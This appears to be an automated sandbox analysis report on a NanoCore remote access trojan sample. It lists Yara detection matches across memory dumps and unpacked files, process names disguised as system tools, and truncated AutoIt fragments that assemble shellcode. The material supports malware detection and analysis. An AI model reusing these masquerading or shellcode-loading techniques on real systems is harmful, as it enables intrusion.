        Source: Yara matchFile source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
        Source: Yara matchFile source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        AutoIt script contains suspicious stringsShow sources
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeAutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeAutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drAutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drAutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeAutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeAutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drAutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drAutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Binary is likely a compiled AutoIt script fileShow sources
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: This is a third-party compiled AutoIt script.
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: This is a third-party compiled AutoIt script.
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000000.249216138.0000000000A75000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: This is a third-party compiled AutoIt script.
        Source: DiagnosticsHub.StandardCollector.Service.exe.batString found in binary or memory: This is a third-party compiled AutoIt script.
